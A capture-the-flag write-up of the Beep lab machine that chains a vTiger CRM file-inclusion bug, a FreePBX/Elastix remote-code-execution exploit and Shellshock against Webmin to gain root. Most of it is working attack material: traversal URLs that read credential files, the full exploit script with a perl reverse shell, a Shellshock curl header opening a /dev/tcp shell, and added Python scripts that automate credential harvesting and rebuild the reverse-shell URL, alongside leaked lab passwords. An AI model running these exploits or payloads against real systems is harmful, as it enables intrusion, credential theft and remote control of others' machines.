10.10.10.7 - Beep - LFI, Shellshock, SUID
Example of LFI and SUID vulnerabilities
Summary:
vulnerable software: vTiger CRM 5.1.0 (the LFI); what it exposes are the credentials of Asterisk Call Manager 1.1 on port 5038
POC system vulnerable: 10.10.10.7
vulnerability explanation: Local File Inclusion in the file sortfieldsjson.php
severity: critical
Enumeration:
Command run:
nmap 10.10.10.7 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-04 19:55 GMT
Nmap scan report for 10.10.10.7
Host is up (0.16s latency).
PORT      STATE SERVICE    VERSION
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
745/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.46 seconds

A separate UDP scan additionally turned up a TFTP server with readable phone-provisioning files:
PORT   STATE SERVICE VERSION
69/udp open  tftp?
| tftp-enum:
|   OS79XX.TXT
|   RINGLIST.DAT
|   XMLDefault.cnf.xml
|   dialplan.xml
|   merlin2.pcm
|_  syncinfo.xml
Directories discovery command:
dirsearch -u https://10.10.10.7/ -w ./raft-medium-directories.txt -e php,txt

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php, txt | Threads: 10 | Wordlist size: 30005

Error Log: /opt/dirsearch/logs/errors-18-01-08_15-16-00.log

Target: https://10.10.10.7/

[15:16:01] Starting:
[15:16:02] 301 - 309B - /admin -> https://10.10.10.7/admin/
[15:16:02] 301 - 310B - /images -> https://10.10.10.7/images/
[15:16:02] 301 - 311B - /modules -> https://10.10.10.7/modules/
[15:16:02] 301 - 310B - /themes -> https://10.10.10.7/themes/
[15:16:03] 301 - 308B - /help -> https://10.10.10.7/help/
[15:16:05] 301 - 307B - /var -> https://10.10.10.7/var/
[15:16:05] 301 - 308B - /mail -> https://10.10.10.7/mail/
[15:16:06] 301 - 310B - /static -> https://10.10.10.7/static/
[15:16:07] 301 - 308B - /lang -> https://10.10.10.7/lang/
[15:16:10] 301 - 308B - /libs -> https://10.10.10.7/libs/
[15:16:19] 301 - 309B - /panel -> https://10.10.10.7/panel/
[15:16:58] 301 - 311B - /configs -> https://10.10.10.7/configs/
[15:23:39] 301 - 314B - /recordings -> https://10.10.10.7/recordings/
[15:26:38] 301 - 313B - /vtigercrm -> https://10.10.10.7/vtigercrm/
[15:26:42] 200 - 2KB - /
Vtiger CRM version 5.1.0 is exposed on https://10.10.10.7/vtigercrm.
Asterisk looks for its configuration in /etc/asterisk by default (a different asterisk.conf can be supplied with a command-line parameter). Of those files, manager.conf holds the usernames and secrets for the Asterisk Manager Interface (AMI), which supporting applications such as FreePBX use to talk to the PBX on port 5038; reading it gives us working credentials.
Which brings us to vulnerability research, showing that Vtiger 5.1 suffers from Local File Inclusion:
searchsploit vtiger 5.1
Details:
# Exploit Title: VTiger CRM
# Google Dork: None
# Date: 20/03/2012
# Author: Pi3rrot
# Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/
# Version: 5.1.0
# Tested on: CentOS 6
# CVE : none

We have found this vulnerability in VTiger 5.1.0
In this example, you can see a Local File Inclusion in the file sortfieldsjson.php

Try this :
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
Source code of sortfieldsjson.php responsible for the LFI:
cat sortfieldsjson.php
<?php
/*+**********************************************************************************
 * The contents of this file are subject to the vtiger CRM Public License Version 1.0
 * ("License"); You may not use this file except in compliance with the License
 * The Original Code is: vtiger CRM Open Source
 * The Initial Developer of the Original Code is vtiger.
 * Portions created by vtiger are Copyright (C) vtiger.
 * All Rights Reserved.
 ************************************************************************************/
function vtSortFieldsJson($request){
    $moduleName = $request['module_name'];                // attacker-controlled
    require_once("modules/$moduleName/$moduleName.php");  // no validation of the path
    $focus = new $moduleName();
    echo Zend_Json::encode($focus->sortby_fields);
}
vtSortFieldsJson($_REQUEST);
Vulnerable part of the code that allows the LFI to exist:

require_once("modules/$moduleName/$moduleName.php");

The require_once statement is identical to require except that PHP will check if the file has already been included and, if so, will not include (require) it again. Here module_name comes straight from $_REQUEST, so "../" sequences walk out of the modules/ directory, and the trailing %00 (NUL byte) terminates the path at the C level so the appended "/$moduleName.php" is never seen. That null-byte truncation only works on PHP versions before 5.3.4, which fits the CentOS 5 era stack (el5 packages) visible in the service banners.
With this information at hand we should be able to retrieve login details: the web application runs as the asterisk user, so the LFI can read Asterisk's own configuration. We can download manager.conf:
└──╼ $wget https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00 --no-check-certificate -O LFI
--2019-01-29 16:01:20--  https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00
Connecting to 10.10.10.7:443... connected.
WARNING: The certificate of ‘10.10.10.7’ is not trusted.
WARNING: The certificate of ‘10.10.10.7’ doesn't have a known issuer.
WARNING: The certificate of ‘10.10.10.7’ has expired.
The certificate has expired
The certificate's owner does not match hostname ‘10.10.10.7’
HTTP request sent, awaiting response... 200 OK
Length: 916 [text/html]
Saving to: ‘LFI’

LFI 100%[=====================================================================================================>] 916 --.-KB/s in 0s

2019-01-29 16:01:21 (8.50 MB/s) - ‘LFI’ saved [916/916]
And view it:
└──╼ $cat LFI
;
; AMI - Asterisk Manager interface
;
; FreePBX needs this to be enabled. Note that if you enable it on a different IP, you need
; to assure that this can't be reached from un-authorized hosts with the ACL settings (permit/deny).
; Also, remember to configure non-default port or IP-addresses in amportal.conf.
;
; The AMI connection is used both by the portal and the operator's panel in FreePBX.
;
; FreePBX assumes an AMI connection to localhost:5038 by default.
;
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0
displayconnects=no ;only effects 1.6+

[admin]
secret = jEhdIekWmdjE
deny=0.0.0.0/0.0.0.0
permit=127.0.0.1/255.255.255.0
read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate

#include manager_additional.conf
#include manager_custom.conf
Revealing the AMI login credentials: user admin, secret jEhdIekWmdjE. (Note the ACL: the permit line restricts AMI logins to localhost, so these credentials matter mostly for reuse elsewhere.)
It is always worth trying gathered credentials against the other services running on the host. Since this is a Linux system with an SSH server running, in this case we were able to log in as root:
Moving on...
Alternatively we can look for other interesting files belonging to the PBX stack, such as FreePBX's /etc/amportal.conf, which stores the database, AMI and operator-panel passwords:
curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00
# FreePBX Database configuration
# AMPDBHOST: Hostname where the FreePBX database resides
# AMPDBENGINE: Engine hosting the FreePBX database (e.g. mysql)
# AMPDBNAME: Name of the FreePBX database (e.g. asterisk)
# AMPDBUSER: Username used to connect to the FreePBX database
# AMPDBPASS: Password for AMPDBUSER (above)
# AMPENGINE: Telephony backend engine (e.g. asterisk)
# AMPMGRUSER: Username to access the Asterisk Manager Interface
# AMPMGRPASS: Password for AMPMGRUSER
#
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE

# AMPBIN: Location of the FreePBX command line scripts
# AMPSBIN: Location of (root) command line scripts
#
AMPBIN=/var/lib/asterisk/bin
AMPSBIN=/usr/local/sbin

# AMPWEBROOT: Path to Apache's webroot (leave off trailing slash)
# AMPCGIBIN: Path to Apache's cgi-bin dir (leave off trailing slash)
# AMPWEBADDRESS: The IP address or host name used to access the AMP web admin
#
AMPWEBROOT=/var/www/html
AMPCGIBIN=/var/www/cgi-bin
# AMPWEBADDRESS=x.x.x.x|hostname

# FOPWEBROOT: Path to the Flash Operator Panel webroot (leave off trailing slash)
# FOPPASSWORD: Password for performing transfers and hangups in the Flash Operator Panel
# FOPRUN: Set to true if you want FOP started by freepbx_engine (amportal_start), false otherwise
# FOPDISABLE: Set to true to disable FOP in interface and retrieve_conf. Useful for sqlite3
# or if you don't want FOP.
#
#FOPRUN=true
FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE
Exposure of users registered on the system by reading /etc/passwd:
curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
One user especially stands out: fanis has a real login shell and a home directory, so it may hold a user flag. We can confirm this with:
curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../home/fanis/user.txt%00
aeff3def0c765c2677b94715cffa73ac
In conclusion:
The LFI vulnerability allowed us to retrieve the login credentials for the FreePBX database and the Asterisk Manager Interface. Reading user.txt shows that the web server's account (asterisk) could read at least ordinary users' home directories. An attacker could also have taken advantage of credential reuse to SSH into the server as an administrator.
We can also, if we want to, try to turn this LFI into RFI. Details here.
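Putting the LFI steps above together, the following added example (my code, not part of the original writeup and not Vtiger's or FreePBX's) builds the traversal URL the same way the page does, fetches files through it, and pulls credential-looking keys out of manager.conf / amportal.conf style files. The helper names (lfi_url, parse_config, harvest_credentials) are my own; the two embedded config samples are excerpts of the files recovered above.

```python
"""Added example, not part of the original writeup: drive the sortfieldsjson.php LFI
and pull credentials out of the recovered Asterisk/FreePBX configuration files.
Helper names are my own; the embedded config text is excerpted from the files
retrieved above."""
import re
import ssl
import urllib.parse
import urllib.request

LFI_ENDPOINT = "/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php"


def lfi_url(base, absolute_path, depth=8):
    """Build the traversal URL for one absolute path on the target.

    require_once("modules/$m/$m.php") prepends 'modules/', so we climb out with
    '../' and finish with a NUL byte (%00) that truncates the appended
    '/$m.php'. Null-byte truncation only works on PHP < 5.3.4."""
    traversal = "../" * depth + absolute_path.lstrip("/")
    # quote() leaves '/' alone and encodes the NUL byte as %00
    return (base.rstrip("/") + LFI_ENDPOINT + "?module_name="
            + urllib.parse.quote(traversal + "\x00"))


def read_file(base, absolute_path, timeout=15):
    """Fetch one file through the LFI. The target presents an expired,
    self-signed certificate, so verification is switched off (lab use only)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(lfi_url(base, absolute_path), context=ctx,
                                timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


SECTION = re.compile(r"^\[(.+?)\]$")
ASSIGN = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*?)$")


def parse_config(text):
    """Parse Asterisk-style (';' comments, [sections]) and amportal.conf-style
    ('#' comments, KEY=VALUE) files into {section: {key: value}}.
    Keys outside any section land under ''. A trailing ' ;comment' is stripped,
    so a value that itself contains ' ;' would be truncated (known limitation)."""
    parsed, section = {"": {}}, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":       # comments and '#include' lines
            continue
        m = SECTION.match(line)
        if m:
            section = m.group(1)
            parsed.setdefault(section, {})
            continue
        m = ASSIGN.match(line.split(" ;", 1)[0].rstrip())
        if m:
            parsed.setdefault(section, {})[m.group(1)] = m.group(2)
    return parsed


SECRET_KEY = re.compile(r"secret|pass", re.I)


def harvest_credentials(parsed):
    """Return (section, key, value) triples for keys that look like secrets."""
    return [(section, key, value)
            for section, kv in parsed.items()
            for key, value in kv.items()
            if SECRET_KEY.search(key)]


# Excerpts of the two files recovered through the LFI above (from the writeup).
MANAGER_CONF = """\
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0
displayconnects=no ;only effects 1.6+

[admin]
secret = jEhdIekWmdjE
deny=0.0.0.0/0.0.0.0
permit=127.0.0.1/255.255.255.0

#include manager_additional.conf
"""

AMPORTAL_CONF = """\
# AMPDBPASS: Password for AMPDBUSER (above)
AMPDBHOST=localhost
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
FOPPASSWORD=jEhdIekWmdjE
"""

if __name__ == "__main__":
    # Live run against the lab host; parsing is exercised on the embedded
    # excerpts without any network access when the module is imported.
    base = "https://10.10.10.7"
    for path in ("/etc/asterisk/manager.conf", "/etc/amportal.conf"):
        for entry in harvest_credentials(parse_config(read_file(base, path))):
            print(path, entry)
```

The depth of eight "../" matches the page's requests; anything at or beyond the filesystem root is harmless, so over-shooting is the safe default. Commented-out old passwords (the amp109 / amp111 lines) are deliberately skipped, but they are still worth noting by hand as candidates for credential reuse.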
Gaining access:
Summary:
vulnerable software: Elastix 2.2.0 (FreePBX 2.10.0)
POC system vulnerable: 10.10.10.7
vulnerability explanation: The $to parameter in recordings/misc/callme_page.php does not get sanitized. After a short trip in between various functions, $to ends up written to the Asterisk Management Interface socket.
privilege escalation: Nmap 4.11 runnable as root through sudo (NOPASSWD), with its --interactive mode still present
vulnerability fix: update both Nmap and Elastix
severity: critical
Logging in with the credentials gathered through the LFI, together with version enumeration, lets us tailor our actions to this particular service.
We learn that the application hosted on the server is Elastix 2.2.0, which is vulnerable to pre-authenticated Remote Code Execution.
Details of FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution; exploits/php/webapps/18650.py:
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
import urllib   # Python 2 (urllib.urlopen)

rhost="172.16.254.72"
lhost="172.16.254.223"
lport=443
extension="1000"

# Reverse shell payload: CRLF-injected "Application: system" / "Data: perl ..." AMI headers
# appended to the callmenum value

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url)
Source code of callme_page.php:
cat callme_page.php
<?php

/**
 * @file
 * for making call to play message
 */

chdir("..");
include_once("./includes/bootstrap.php");
include_once("./includes/common.php");

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<TITLE>Voicemail Message Call Me Control</TITLE>
<link rel="stylesheet" href="../theme/main.css" type="text/css">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
</head>

<?php

// login to database
$success = databaseLogon();
if ($success) {
    $path = $_SESSION['ari_user']['recfiles'][$_REQUEST['recindex']];
    $pageaction = $_REQUEST['action'];
    $to = $_REQUEST['callmenum'];        // attacker-controlled, never sanitised
    $msgFrom = $_REQUEST['msgFrom'];
    $new_path = substr($path, 0, -4); /* Without the sound file extension. */
    $matches[0] = ''; /* init the $matches array. */
    /* Either start or end the call me call */
    switch($pageaction)
    {
        case "c":
            /* Call me. */
            $call_status = callme_startcall($to, $msgFrom, $new_path);   // $to ends up on the AMI socket
            echo("<table class='voicemail' style='width: 100%; height: 100%; margin: 0 0 0 0; border: 0px; padding: 0px'><tr><td valign='middle' style='border: 0px'>");
            /* if successful, display hang-up button */
            if (callme_succeeded($call_status))
            {
                echo("<a href='callme_page.php?action=h&callmenum=" . $to . "'>Click here to hang up.</a>");
            }
            echo("</td></tr></table>");
            echo("<script language='javascript'>parent.document.getElementById('callme_status').innerHTML = '" . _("$call_status") . "';</script>");
            echo("<script language='javascript'>parent.document.getElementById('pb_load_inprogress').value='false';</script>");
            echo("<script language='javascript'>parent.document.getElementById('callme_status').parentNode.style.backgroundColor = 'white';</script>");
            break;
        case "h":
            /* Hang up. */
            /* Find the channel and hang it up if it still exists. */
            callme_hangup($to);
            echo("<script language='javascript'>parent.document.getElementById('callme_status').innerHTML = '" . _("The call was terminated.") . "';</script>");
            break;
    }
}
else {
    echo("Unable to connect to Asterisk Manager Interface");
}

// log off any databases needed
databaseLogoff();

?>
</body>
</html>
Configure the exploit code:
rhost – target IP – 10.10.10.7
lhost – attacker listener IP – 10.11.0.249 (your own VPN address)
lport – attacker listener port – 443
In order to succeed with this exploit we need a valid extension number. We can find one with svwar, the SIPVicious extension scanner, which probes a SIP PBX for valid extension lines.
Note that svwar can make the probed extensions actually ring (when scanning with INVITE), so don't run it in the middle of the night if you don't want to disturb the neighbours.
We feed the discovered extension (233) to our exploit code and are ready to launch it:
Note: if you get the error below, add the following two lines to the beginning of the Python code so that the target's expired, self-signed certificate is not verified:
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
Error code:
IOError: [Errno socket error] [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727)
Modifications to the exploit code:
Exploit code pointed at the vulnerable application and netcat catching the reverse shell:
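To make the injection concrete, here is an added example (my code, not muts' exploit and not FreePBX/Elastix code) that rebuilds the callmenum value the exploit sends and decodes it back into the header lines the AMI socket receives. The target, listener and extension values are parameters (the embedded URL is the exploit-db entry's own, with its placeholder lab addresses); the helper names are mine.

```python
"""Added example, not muts' exploit and not FreePBX code: rebuild the callmenum
value the exploit sends and decode it back into the AMI header lines the PBX
ends up reading. Target/listener/extension values are parameters."""
import urllib.parse

CALLME_PATH = "/recordings/misc/callme_page.php"

# Verbatim URL the exploit-db script above produces with its placeholder lab IPs.
EXPLOITDB_URL = (
    "https://172.16.254.72/recordings/misc/callme_page.php?action=c&callmenum=1000"
    "@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27"
    "%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28"
    "PeerAddr%2c%22172.16.254.223%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b"
    "%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A"
)


def reverse_shell_command(lhost, lport):
    """The perl one-liner the exploit runs on the PBX: fork, connect back,
    wire stdin/stdout to the socket, execute each received line."""
    return ("perl -MIO -e '$p=fork;exit,if($p);"
            "$c=new IO::Socket::INET(PeerAddr,\"" + lhost + ":" + str(lport) + "\");"
            "STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'")


def build_callmenum(extension, command):
    """CRLF injection: callme_page.php writes the extension into the AMI request
    it uses to originate the call-me call without sanitising it, so '\r\n' closes
    the header line being built and Asterisk reads everything after it as further
    AMI headers. 'Application: system' + 'Data: <cmd>' makes it run a shell command."""
    return (extension + "@from-internal/n"
            + "\r\nApplication: system"
            + "\r\nData: " + command
            + "\r\n\r\n")               # blank line terminates the AMI action


def build_url(rhost, lhost, lport, extension):
    """Full attack URL; quote_via=quote gives %20 for spaces, as in the exploit."""
    query = urllib.parse.urlencode(
        {"action": "c",
         "callmenum": build_callmenum(extension, reverse_shell_command(lhost, lport))},
        quote_via=urllib.parse.quote)
    return "https://" + rhost + CALLME_PATH + "?" + query


def decode_callmenum(url):
    """Recover the raw callmenum value (what $_REQUEST['callmenum'] holds)."""
    return urllib.parse.parse_qs(urllib.parse.urlparse(url).query)["callmenum"][0]


def ami_lines(callmenum):
    """Split the injected value into the header lines the AMI socket receives."""
    return [line for line in callmenum.split("\r\n") if line]


if __name__ == "__main__":
    # Show what the PBX sees for the page's scenario (extension 233, HTB VPN listener).
    for line in ami_lines(decode_callmenum(build_url("10.10.10.7", "10.10.14.20", 443, "233"))):
        print(repr(line))
```

Decoding the exploit-db URL and the rebuilt one to the same value is the check that the encoding is right; the three decoded lines are exactly why the fix is to reject CR/LF in anything that is written into an AMI header.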
Privilege Escalation
While looking for commands the asterisk user may run as root via sudo, Nmap was identified:
sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
SUID (Set owner User ID upon execution) is a special type of file permission. Normally on Linux/Unix a program runs with the permissions of the user who started it; a SUID binary instead runs with the permissions (the UID, and the GID for SGID) of the file's owner. Note that what sudo -l lists above is sudo policy (NOPASSWD rules), not SUID bits, but the effect is the same for our purposes: the asterisk user can run these programs as root, and any of them that can spawn a shell or write arbitrary files (nmap, chmod, chown, touch, yum, ...) is a root escalation.
Nmap releases before 5.50 (up to 5.21) shipped an --interactive mode in which a command prefixed with ! is handed to a shell, so arbitrary commands run as root:
sudo nmap --interactive
At the nmap> prompt, !sh drops into a root shell.
Summary:
vulnerable software: MiniServ 1.570 (Webmin httpd)
POC system vulnerable: 10.10.10.7:10000
vulnerability explanation: Shellshock, CVE-2014-6271
severity: critical
On top of that, the server was also vulnerable to Shellshock, as it runs the vulnerable MiniServ 1.570 (Webmin) HTTP server on port 10000 and exposes the CGI script /file/show.cgi to unauthenticated users:
Proof:
Theory:
When a web server uses the Common Gateway Interface (CGI) to handle a document request, it passes various details of the request to the handler program as environment variables. For example, HTTP_USER_AGENT carries the value of the User-Agent header, which in normal usage identifies the program sending the request. If the request handler is a Bash script, or executes one (for example through the system(3) call), Bash receives the environment variables passed by the server and, on unpatched versions, parses any value beginning with "() {" as a function definition and executes whatever follows it. This gives an attacker a way to trigger Shellshock with a specially crafted request, and the same applies to any other header, since each one becomes an HTTP_* variable. Security documentation for the widely used Apache web server states: "CGI scripts can ... be extremely dangerous if they are not carefully checked." and other methods of handling web server requests are often used. There are a number of online services which attempt to test the vulnerability against web servers exposed to the Internet.
Reference
Shellshock exploitation:
Burp sending the request and triggering the shell:
I was also curious what happens during exploitation, so I copied the above command as a curl request and made a request to the victim:
└──╼ $curl -i -s -k -X 'GET' \
> -H 'Host: 10.10.10.7:10000' -H 'user-agent: () { :; }; bash -i >& /dev/tcp/10.10.14.20/4444 0>&1' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Connection: close' -H 'Upgrade-Insecure-Requests: 1' \
> 'https://10.10.10.7:10000/file/show.cgi'
HTTP/1.0 200 Document follows
Date: Wed, 30 Jan 2019 21:53:35 GMT
Server: MiniServ/1.570
Connection: close
Set-Cookie: testing=1; path=/; secure
pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-type: text/html; Charset=iso-8859-1

<!doctype html public "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<link rel='stylesheet' type='text/css' href='/unauthenticated/style.css' />
<script type='text/javascript' src='/unauthenticated/toggleview.js'></script>
<script>
var rowsel = new Array();
</script>
<script type='text/javascript' src='/unauthenticated/sorttable.js'></script>
<meta http-equiv="Content-Type" content="text/html; Charset=iso-8859-1">
Successful reverse shell and confirmation of vulnerable Bash environment:
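As an added example (my code, not from the original page or from Webmin), the following builds the Shellshock header the way the curl request above does, shows which CGI variable it lands in, and flags such headers in raw requests, which is the detection side of the same mechanism. The sample requests are constructed; the function names are mine.

```python
"""Added example, not from the original page: build a Shellshock (CVE-2014-6271)
header the way the curl request above does, show which CGI variable it lands in,
and flag such headers in raw requests. Sample requests are constructed."""
import re
import subprocess

# The '() {' prefix that makes a pre-patch bash treat an environment variable's
# value as a function definition; it then executes whatever follows the '};'.
FUNCTION_PREFIX = re.compile(r"\(\)\s*\{")


def shellshock_header(command, header="User-Agent"):
    """Header line carrying a bash function body followed by the injected command."""
    return header + ": () { :; }; " + command


def cgi_env_name(header):
    """CGI exports every request header as HTTP_<NAME>, which is why any header
    (Cookie, Referer, ...), not just User-Agent, reaches bash."""
    return "HTTP_" + header.strip().upper().replace("-", "_")


def flagged_headers(raw_request):
    """Return the names of headers in a raw HTTP request whose value carries
    the function-definition prefix. Matching on '() {' rather than the exact
    '() { :; };' catches the spacing variants seen in the wild."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    flagged = []
    for line in head.split("\r\n")[1:]:      # skip the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        if FUNCTION_PREFIX.search(value):
            flagged.append(name.strip())
    return flagged


def bash_is_vulnerable(bash="bash"):
    """Local check: a vulnerable bash prints 'vulnerable' when it imports the
    crafted variable, a patched one only prints 'probe'. Returns None if bash
    cannot be run at all."""
    try:
        out = subprocess.run(
            [bash, "-c", "echo probe"],
            env={"x": "() { :; }; echo vulnerable", "PATH": "/usr/bin:/bin"},
            capture_output=True, text=True, timeout=10).stdout
    except (OSError, subprocess.SubprocessError):
        return None
    return "vulnerable" in out


if __name__ == "__main__":
    h = shellshock_header("bash -i >& /dev/tcp/10.10.14.20/4444 0>&1")
    print(h, "->", cgi_env_name("User-Agent"))
    print("local bash vulnerable:", bash_is_vulnerable())
```

The detector deliberately looks at every header, since show.cgi (or any CGI) exports all of them; a rule that only inspects User-Agent misses the Cookie/Referer variants.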